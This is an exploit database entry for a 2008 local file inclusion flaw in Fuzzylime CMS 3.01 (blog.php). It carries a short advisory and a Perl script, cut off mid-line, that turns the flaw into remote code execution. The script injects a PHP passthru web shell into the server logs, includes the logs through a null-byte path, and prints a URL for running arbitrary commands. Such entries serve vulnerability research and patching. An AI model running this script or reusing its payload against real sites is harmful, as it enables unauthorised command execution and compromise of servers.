Exploit Fuzzylime (cms) 3.01 - 'blog.php' Local File Inclusion

[Exploiter]

EDB-ID

32016

Проверка EDB

1. Пройдено

Автор

COD3RZ

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2008-3164

Дата публикации

2008-07-07

source: https://www.securityfocus.com/bid/30121/info

'fuzzylime (cms)' is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary local script code. This can allow the attacker to obtain sensitive information that may aid in further attacks.

This issue affects fuzzylime (cms) 3.01a; other versions may also be affected. 

#!/usr/bin/perl
# Fuzzylime CMS 3.01 LFI / RCE
# author  : Cod3rZ
# website : http://cod3rz.helloweb.eu
#
# http://[site]/blog.php?file=../[file]\0
# LFI TO RCE
use LWP::UserAgent;
 system("cls");
#system("clear");
 print " -------------------------------------------------\n";
 print " Fuzzylime CMS 3.01 LFI / RCE                     \n";
 print " Powered by Cod3rZ                                \n";
 print " http://cod3rz.helloweb.eu                        \n";
 print " -------------------------------------------------\n";
 print " Insert Site (http://site.com/):                  \n ";
 chomp($site = <STDIN>);
 print " -------------------------------------------------\n";
 print " Insert Logs path                                 \n ";
 chomp($path = <STDIN>);
 print " -------------------------------------------------\n";
 
 #Infect Logs
 $lwp = LWP::UserAgent->new;
 $siten = $site.'/blog.php?file=';
 $ua = $lwp->get($site.'coderz <?php passthru(stripslashes($_GET[cmd])); ?> /coderz');
 #Control
 $ua = $lwp->get($site.$path.'%00');
 if($ua->content =~ m/cod3rz/) {
 print " Ok ".$site." is infected                         \n";
 print " -------------------------------------------------\n";
 print " ".$siten.$path."&cmd=[command]\\0                 \n";
 print " --